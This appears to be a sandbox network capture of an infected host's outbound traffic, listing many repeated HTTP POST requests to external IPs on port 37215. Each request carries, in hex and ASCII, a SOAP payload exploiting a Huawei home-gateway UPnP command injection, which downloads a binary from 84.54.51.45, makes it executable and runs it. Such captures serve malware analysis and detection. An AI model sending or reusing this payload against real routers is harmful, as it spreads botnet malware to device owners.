                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            749192.168.2.154358041.16.10.25037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739276886 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            750192.168.2.153352841.66.178.22137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739305019 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            751192.168.2.154519641.131.129.2037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739343882 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            752192.168.2.154673841.69.194.10437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739345074 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            753192.168.2.155183441.186.84.3537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739388943 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            754192.168.2.154212241.159.76.8137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739391088 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            755192.168.2.154814041.237.12.12137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739408016 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            756192.168.2.154848041.166.136.23637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739454985 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            757192.168.2.155615641.113.253.8637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739483118 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            758192.168.2.154488841.130.109.037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739509106 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 